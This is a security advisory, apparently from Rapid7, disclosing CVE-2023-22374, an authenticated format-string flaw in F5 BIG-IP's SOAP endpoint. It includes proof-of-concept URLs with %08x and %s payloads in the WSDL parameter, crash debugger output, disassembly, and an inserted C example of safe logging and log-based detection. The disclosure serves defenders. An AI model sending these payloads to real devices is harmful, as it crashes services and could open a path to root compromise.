Last updated at Wed, 01 Feb 2023 15:57:57 GMT

While following up our previous work on F5's BIG-IP devices, Rapid7 found an additional vulnerability in the appliance-mode REST interface; the vulnerability was assigned CVE-2023-22374. We reported it to F5 on December 6, 2022, and are now disclosing it in accordance with our vulnerability disclosure policy.
The specific issue we discovered is an authenticated format string vulnerability (CWE-134) in the SOAP interface (iControlPortal.cgi), which runs as root and requires an administrator login to access. By inserting format string specifiers (such as %s or %n) into certain GET parameters, an attacker can cause the service to read and write memory at addresses referenced from the stack. In addition to being an authenticated administrative endpoint, the disclosed memory is written to a log rather than returned to the client (making this a blind attack). It is difficult to influence the specific addresses read and written, which makes this vulnerability difficult to exploit in practice (beyond crashing the service). This has a CVSS score of 7.5 for standard mode deployments and 8.5 in appliance mode.

Products

This issue only affects BIG-IP (not BIG-IQ), and there is no fix yet. The currently supported versions known to be vulnerable are:

  • F5 BIG-IP 17.0.0
  • F5 BIG-IP 16.1.2.2 - 16.1.3
  • F5 BIG-IP 15.1.5.1 - 15.1.8
  • F5 BIG-IP 14.1.4.6 - 14.1.5
  • F5 BIG-IP 13.1.5

Discoverer

This issue was discovered by Ron Bowes of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The issue we are disclosing is a blind format string vulnerability, in which an authenticated attacker can insert arbitrary format string characters (such as %d, %x, %s, and %n) into a query parameter, which is passed into the function syslog(), which processes format-string specifiers. This does not require the attacker to actually read the syslog entries; the act of parsing the format string is what is problematic. That also means that the attacker can't read memory unless they have an additional way to read the syslog. By using the %s specifier, the service can be crashed with a segmentation fault (because it tries to dereference a pointer on the stack as a string). Using %n, arbitrary data can be written to any pointer found on the stack; depending on what is on the stack, this may be exploitable for remote code execution.

The issue occurs in the WSDL= parameter in the following authenticated administrative URL:

The value of the WSDL= parameter is written to the syslog:

Nov 29 08:32:25 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile

If an attacker adds format-string characters to that argument, they will be processed, and values from the stack can be written to the syslog (which the attacker cannot see, so it's actually a blind format-string vulnerability). For example, this URL:

  • http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x

Might write the following, after expanding the %08x format specifiers into values from the stack (the colons are just for readability):

Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile:0000004c:0000004c:08cb31bc:08cba210:08cc4954:01000000:ffeaa378:f5aa8000

Once again, we should note that an attacker cannot see this log, and therefore cannot use this to disclose memory. We can, however, use a %s format specifier, which tells the service to attempt to render a string from the stack. If the value on the stack is not a valid memory address (for example the first value, which is 0x0000004c), the process will crash with a segmentation fault. We can also use the %n format specifier to write (mostly) arbitrary values to memory addresses found on the stack.

Here is an example of using the %s specifier in a request:

  • http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%s

If we send this to the server (as an authenticated request), the service will crash. We can attach a debugger to the server process to validate:

[root@bigip:Active:Standalone] config # /tmp/gdb-7.10.1-x64 -q --pid=4335
[...]
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xf55e3085 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0xf55e3085 in vfprintf () from /lib/libc.so.6
#1  0xf568f21f in __vsyslog_chk () from /lib/libc.so.6
#2  0xf568f317 in syslog () from /lib/libc.so.6
#3  0x0810cc1f in PortalDispatch::HandleWSDLRequest(char*) ()
#4  0x08109f08 in iControlPortal::run(int) ()
#5  0x0810947f in main ()

The actual vulnerable code in PortalDispatch::HandleWSDLRequest in iControlPortal.cgi is (in a disassembler):

.text:0810CBF2 loc_810CBF2:                            ; CODE XREF: PortalDispatch::HandleWSDLRequest(char *)+DD↑j
.text:0810CBF2                 pop     ecx
.text:0810CBF3                 pop     edi
.text:0810CBF4                 push    esi             ; Query string
.text:0810CBF5                 push    eax
.text:0810CBF6                 call    __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<>(std::basic_ostream> &,char const*)
.text:0810CBFB                 pop     eax
.text:0810CBFC                 pop     edx
.text:0810CBFD                 lea     eax, [ebp+var_8C8]
.text:0810CC03                 lea     edi, [ebp+format]
.text:0810CC09                 push    eax
.text:0810CC0A                 push    edi
.text:0810CC0B                 call    __ZNKSt15basic_stringbufIcSt11char_traitsIcESaIcEE3strEv ; std::basic_stringbuf,std::allocator>::str(void)
.text:0810CC0B ;   } // starts at 810CBE6
.text:0810CC10                 pop     eax
.text:0810CC11                 push    dword ptr [ebp+format]
.text:0810CC17                 push    6
.text:0810CC19 ;   try {
.text:0810CC19                 call    _syslog ; <--- Vulnerable call to syslog()
.text:0810CC19 ;   } // starts at 810CC19

A String object (that contains query:) has the query string appended to it and is then passed directly to _syslog() as the format argument, which processes format string characters.
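To make the defect and its fix concrete, here is an added C illustration (not code from the advisory, from F5, or from iControlPortal.cgi) of the logging pattern just described. The vulnerable shape, shown in a comment, builds the message first and then hands that message to syslog() as the format string; the hardened version keeps a constant format and passes the query as an argument, so "%s" and "%n" in the query are inert. A small directive counter is included as the kind of check a defender could apply to parameter values before logging them, or to existing syslog lines when looking for attempts. The query values and log line below are constructed samples modelled on the ones quoted above; all function names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Count printf-style conversion directives in s: every '%' that does not
 * begin the escape "%%". A parameter value that is meant to be logged as
 * plain text should contain none of these. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        n++;                    /* "%s", "%n", "%08x", or a dangling '%' */
    }
    return n;
}

/* Vulnerable shape (the bug described in the advisory), for contrast:
 *
 *     snprintf(line, sizeof line, "query: %s", query);
 *     syslog(LOG_INFO, line);   // line is now the FORMAT string
 *
 * Because the query has already been concatenated into `line`, any "%"
 * directive it carries is interpreted by syslog()/vfprintf(). It is left
 * as a comment so this file compiles under -Werror=format-security. */

/* Hardened shape: the format string is a constant and the query is an
 * argument, so directives inside it are just characters in the output. */
void log_query_safe(const char *query)
{
    syslog(LOG_INFO, "query: %s", query);
}

/* Same hardened formatting rendered into a caller-supplied buffer, so the
 * resulting line can be inspected without a syslog daemon. Returns the
 * length snprintf() would have written. */
int format_query_safe(char *out, size_t outlen, const char *query)
{
    return snprintf(out, outlen, "query: %s", query);
}

/* Given a syslog line in the form quoted above, return the number of
 * format directives found after "query: " (0 when that prefix is absent).
 * Useful as a retrospective check over existing logs. */
int directives_in_log_line(const char *line)
{
    const char *q = strstr(line, "query: ");
    return q ? count_format_directives(q + strlen("query: ")) : 0;
}

int main(void)
{
    /* Constructed sample values, modelled on the advisory's examples. */
    const char *benign = "WSDL=ASM.LoggingProfile";
    const char *suspect = "WSDL=ASM.LoggingProfile:%08x:%08x:%s";
    char buf[256];

    format_query_safe(buf, sizeof buf, suspect);
    printf("rendered safely: %s\n", buf);
    printf("directives in benign value:  %d\n", count_format_directives(benign));
    printf("directives in suspect value: %d\n", count_format_directives(suspect));
    return 0;
}
```

The rendered line still contains the literal text "%08x:%08x:%s", because with a constant format the query is data rather than instructions; that is the whole fix. The counter deliberately treats a dangling trailing '%' as a directive, since that is malformed input worth flagging too.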

Impact

The most likely impact of a successful attack is to crash the server process. A skilled attacker could potentially develop a remote code execution exploit, which would run code as the root user on the F5 BIG-IP device.

Remediation

There is currently no fix for this issue in released BIG-IP software versions. F5 has indicated that an engineering hotfix will be made available. It should be emphasized that this issue can only be exploited as an authenticated user of the vulnerable device. So, end users should restrict access to the management port to trusted individuals only (the linked KB provides a procedure for binding webd to localhost), which is usually good advice anyway.

Rapid7 customers

An authenticated vulnerability check for CVE-2023-22374 will be released today (February 1) in a content-only release. Because, under F5's hotfix policy, these hotfixes are "not guaranteed to be available", please note that the vulnerability check in InsightVM does not take hotfixes into account.

Timeline

  • December, 2022 - Discovered the vulnerability
  • Tue, Dec 6, 2022 - Reported to F5 SIRT
  • Wed, Dec 7, 2022 - F5 forwarded the report to the F5 product engineering team for analysis
  • Thu, Dec 22, 2022 - F5 confirmed the issue and began working on a fix
  • Wed, Jan 4, 2023 - Reported the issue to CERT/CC (vrf# 23-01-TVJZN)
  • Wed, Jan 18, 2023 - F5 provided a draft security advisory, CVSS scoring, and CVE-2023-22374 reservation
  • Wed, Feb 1, 2023 - This public disclosure and F5's advisory published